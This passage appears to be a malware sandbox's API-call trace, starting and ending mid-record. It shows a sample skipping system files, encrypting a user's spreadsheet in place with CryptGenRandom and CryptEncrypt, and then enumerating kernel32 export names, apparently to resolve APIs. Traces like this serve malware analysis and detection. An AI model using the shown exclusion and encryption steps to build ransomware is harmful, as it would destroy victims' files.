(lpString1="-keodEgSHy.xlsx", lpString2="ntuser.dat") returned -1 [0083.677] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="iconcache.db") returned 1 [0083.677] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="bootsect.bak") returned 1 [0083.677] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="ntuser.dat.log") returned -1 [0083.677] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="thumbs.db") returned -1 [0083.677] lstrcmpiW (lpString1="-keodEgSHy.xlsx", lpString2="Bootfont.bin") returned 1 [0083.677] lstrlenW (lpString="-keodEgSHy.xlsx") returned 15 [0083.677] lstrcmpiW (lpString1="xlsx", lpString2="lnk") returned 1 [0083.677] lstrcmpiW (lpString1="xlsx", lpString2="exe") returned 1 [0083.677] lstrcmpiW (lpString1="xlsx", lpString2="sys") returned 1 [0083.677] lstrcmpiW (lpString1="xlsx", lpString2="dll") returned 1 [0083.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0083.677] lstrlenW (lpString="-keodEgSHy.xlsx") returned 15 [0083.677] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0083.677] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="-keodEgSHy.xlsx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx" [0083.677] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-keodEgSHy.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-keodegshy.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.677] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=6289) returned 1 [0083.677] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.677] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.678] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.678] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.678] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.678] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.678] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.679] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.679] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.679] CloseHandle (hObject=0x414) returned 1 [0083.679] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.679] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.680] CloseHandle (hObject=0x0) returned 0 [0083.680] CloseHandle (hObject=0x410) returned 1 [0083.680] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.680] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.680] GetTickCount () returned 0x114d634 [0083.680] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.681] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.681] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.681] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.681] lstrlenA (lpString="kernel32.dll") returned 12 [0083.681] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.681] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.681] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.682] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.682] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.682] lstrlenA (lpString="ADDATOMA") returned 8 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.682] lstrlenA (lpString="ADDATOMW") returned 8 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.682] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.682] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.682] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.682] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.682] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.682] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.682] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.682] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.682] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.682] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.682] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.682] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.682] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.682] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.683] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.683] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.683] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.683] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.683] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.683] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.683] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.683] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.683] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.683] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.683] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.683] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.683] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.683] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.683] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.683] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.683] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.683] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.684] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.684] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.684] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.684] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.684] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.684] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.684] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.684] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.684] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.684] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.684] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.684] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.684] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.684] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.684] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.684] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.684] lstrlenA (lpString="BEEP") returned 4 [0083.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.684] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.685] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.685] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.685] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.685] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.685] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.685] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.685] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.685] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.685] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.685] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.685] lstrlenA (lpString="CANCELIO") returned 8 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.685] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.685] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.685] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.685] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.685] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.685] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.685] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.686] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.686] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.686] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.686] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.686] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.686] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.686] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.686] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.686] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.686] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.686] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.686] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.686] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.686] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.686] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.686] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.686] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.686] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.686] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.687] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.687] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.687] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.687] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.687] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.687] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.687] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") 